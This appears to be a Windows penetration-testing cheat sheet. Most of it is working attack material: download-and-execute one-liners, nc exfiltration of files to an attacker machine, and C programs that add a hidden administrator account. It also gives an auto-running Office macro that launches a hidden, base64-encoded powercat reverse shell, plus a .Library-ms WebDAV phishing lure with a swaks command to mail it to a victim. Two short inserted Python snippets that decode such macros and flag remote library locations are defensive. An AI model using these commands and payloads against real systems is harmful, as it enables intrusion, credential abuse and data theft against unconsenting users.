Miscellaneous
A collection of nifty tricks and hacks to make your Windows pentesting smarter, faster, and stealthier.
Downloading files onto a Windows machine
Method 1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"
Method 2
certutil -urlcache -split -f http://192.168.1.1/exploit.exe
Method 3
iwr -uri http://192.168.1.1/Powerview.ps1 -Outfile PowerView.ps1
Method 4
iex(new-object net.webclient).downloadstring('http://192.168.1.1/Invoke-ADEnum.ps1')
Method 5
Use the impacket-smbserver command on the Kali machine to start an SMB server
impacket-smbserver -smb2support smb tools/
Then fetch the file on the Windows machine with the copy command
copy \\192.168.1.1\smb\PowerView.ps1
Downloading files from a Windows machine to the Kali machine
Method 1
Enable SSH on the Kali machine with the command below
sudo service ssh start
Use the command below on the Windows machine to push the file to Kali
scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/destination/directory/
Method 2
Use the command below to start an upload server on the Kali machine
$ python3 -m uploadserver 8000
File upload available at /upload
Push files from the Windows machine
# In PowerShell 7+
Invoke-RestMethod -Uri "http://192.168.45.157:8000/upload" -Method Post -Form @{ files = Get-Item "C:\path\to\file.zip" }
Method 3
Create an SMB server with the impacket-smbserver command (the share name is myshare, backed by the local directory share)
impacket-smbserver myshare share -smb2support
Push the file from the Windows machine with the copy command
copy C:\Location\of\the\file \\IP_of_your_kali_machine\myshare
Method 4
Set up a listener on the Kali machine that writes whatever arrives to a file
nc -nvlp 4242 > Pawan_audit_20250726063755_BloodHound.zip
Download nc.exe to the Windows machine and use this command to push the zip file.
cmd.exe /c ".\nc.exe 192.168.45.157 4242 < Pawan_audit_20250726063755_BloodHound.zip"
Cross-compiling code on Kali
The command below builds a quick Windows executable from a C source file, which you can then push to the Windows machine and execute
i686-w64-mingw32-gcc program.c -o exploit.exe
C programs for malicious activity on Windows
Prog 1: Add a user on a Windows machine
This adds the user pawan with the password 123! and puts that user in the Administrators group
#include <stdlib.h>

int main(void)
{
    /* Create the local user, then add it to the local Administrators group. */
    system("net user pawan 123! /add");
    system("net localgroup administrators pawan /add");
    return 0;
}
Prog 2: Change the password of a user
This program changes the password of the user Pawan
#include <stdlib.h>

int main(void)
{
    /* Set a new password for the existing account. */
    system("net user Pawan NewPassword456!");
    return 0;
}
The programs above can be used in Service Binary Hijacking, DLL Hijacking, Unquoted Service Paths, etc., and can be cross-compiled into an .exe with the command given in this section.
Get a reverse shell from a macro
You can download the Python script RevShellMacro.py to do the work: just enter the IP address and port. The default HTTP port for downloading powercat from the Kali machine is 80.
Below is the detailed method, in case you want to do the hard work yourself.
Step 1. Get the powercat command for the reverse shell
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
This command downloads powercat.ps1 from your Kali machine and executes it to get a reverse shell on port 4444
Step 2. Base64 encode your command
pwsh
$Text="IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230/powercat.ps1');powercat -c 192.168.45.230 -p 4444 -e powershell"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA
Step 3. Divide your command into chunks using python3
Assign the command to a variable
>>> my_str = "powershell.exe -nop -w hidden -enc <base64_encoded_command>"
Decide the chunk size and print the command in pieces.
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
Below is the result of the above commands
└─$ python3
Python 3.13.3 (main, Apr 10 2025, 21:38:51) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> my_str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAb\
gB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGMAYQB0AC4AcAB\
zADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA\
GwA"
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
...
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"
Step 4. Put everything together in the macro
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
    Str = Str + "DIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGM"
    Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQB"
    Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
    Str = Str + "GwA"
    CreateObject("Wscript.Shell").Run Str
End Sub
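From the defender's side, the macro pattern in Steps 2 to 4 (an -enc payload assembled from chunked Str = Str + "..." lines) is easy to triage once the chain is joined back together and the UTF-16LE base64 is decoded. This is an added example, not part of the original notes or the RevShellMacro.py script; the macro it inspects is constructed inline around a harmless command.

```python
import base64
import re

# Constructed sample (not a real payload): a harmless command encoded the way
# the notes do (UTF-16LE, then base64) and split into 50-character chunks.
_PLAIN = 'Write-Output "constructed sample, not a payload"'
_ENC = base64.b64encode(_PLAIN.encode("utf-16-le")).decode()
_FULL = "powershell.exe -nop -w hidden -enc " + _ENC
SAMPLE_MACRO = "\n".join(
    ["Sub AutoOpen()", "MyMacro", "End Sub", "Sub MyMacro()", "Dim Str As String"]
    + ['Str = Str + "%s"' % _FULL[i:i + 50] for i in range(0, len(_FULL), 50)]
    + ['CreateObject("Wscript.Shell").Run Str', "End Sub"]
)

AUTO_EXEC = ("AutoOpen", "Document_Open", "Auto_Open", "Workbook_Open")
# One link of the chain: <var> = <var> + "..."  (VBA also allows & for concat)
CHUNK_RE = re.compile(r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*"([^"]*)"\s*$', re.M)
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def reassemble(macro: str) -> str:
    """Join the pieces of the concatenation chain back into one command line."""
    return "".join(m.group(2) for m in CHUNK_RE.finditer(macro))

def decode_enc(cmdline: str):
    """Decode an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(macro: str) -> dict:
    """Summarise what a reviewer wants to know: auto-exec entry points,
    shell object use, the assembled command and its decoded payload."""
    cmd = reassemble(macro)
    return {
        "auto_exec": [s for s in AUTO_EXEC if re.search(r"\bSub\s+%s\b" % s, macro)],
        "shell_object": "wscript.shell" in macro.lower(),
        "assembled_command": cmd,
        "decoded_payload": decode_enc(cmd),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The same decoder applies to a raw `powershell -enc ...` command line pulled from a process-creation event, not only to macros.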
Reverse shell from Windows library files
The steps below generate a Windows library file (.Library-ms) that leads to a reverse shell
Step 1. Get the powercat command for the reverse shell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.5:8080/powercat.ps1'); powercat -c 192.168.45.189 -p 4444 -e powershell"
This command downloads powercat.ps1 from your Kali machine and executes it to get a reverse shell on port 4444; host the file on port 8080. Use this command when creating the shortcut file; once the shortcut is double-clicked and opened, the command is executed.
Step 2. Create a WebDAV share
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/location_to/share/
Step 3. Library code for connecting to the share
You can use VS Code to create the config.Library-ms file
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.1.5</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
Change the IP in the code above to the attacker's IP.
Step 4. Share it with the victim
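What makes this file worth alerting on is the simpleLocation URL: a library whose connector points at a web or WebDAV host instead of a local folder. The following is an added example (not part of the original notes) that parses a .Library-ms file and reports every location that leaves the host; the sample it inspects is constructed with a TEST-NET placeholder address.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample in the layout of the config.Library-ms above, with a
# TEST-NET placeholder instead of a real host plus one ordinary local folder.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation><url>http://203.0.113.10</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

def classify(location: str) -> str:
    """'unc' for \\\\server\\share, 'web' for http(s)/WebDAV, otherwise 'local'."""
    if location.startswith("\\\\"):
        return "unc"
    if urlparse(location).scheme.lower() in ("http", "https"):
        return "web"
    return "local"

def locations(library_xml: str) -> list:
    """Every simpleLocation/url in the library, paired with its class."""
    root = ET.fromstring(library_xml.encode("utf-8"))
    urls = [u.text.strip()
            for u in root.iterfind(".//lib:simpleLocation/lib:url", NS) if u.text]
    return [(u, classify(u)) for u in urls]

def remote_locations(library_xml: str) -> list:
    """The subset worth alerting on: anything that makes Explorer leave the host."""
    return [u for u, kind in locations(library_xml) if kind != "local"]

if __name__ == "__main__":
    for url, kind in locations(SAMPLE_LIBRARY_MS):
        print(f"{kind:5s} {url}")
```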
sudo swaks -t victim@mail.com --from pawan.kumar@mail.com --attach @config.Library-ms --server <victim-IP>:587 --body @mail.txt --header "Subject: Important-Update" --suppress-data -ap
The command above only works if you have valid credentials for the mail server.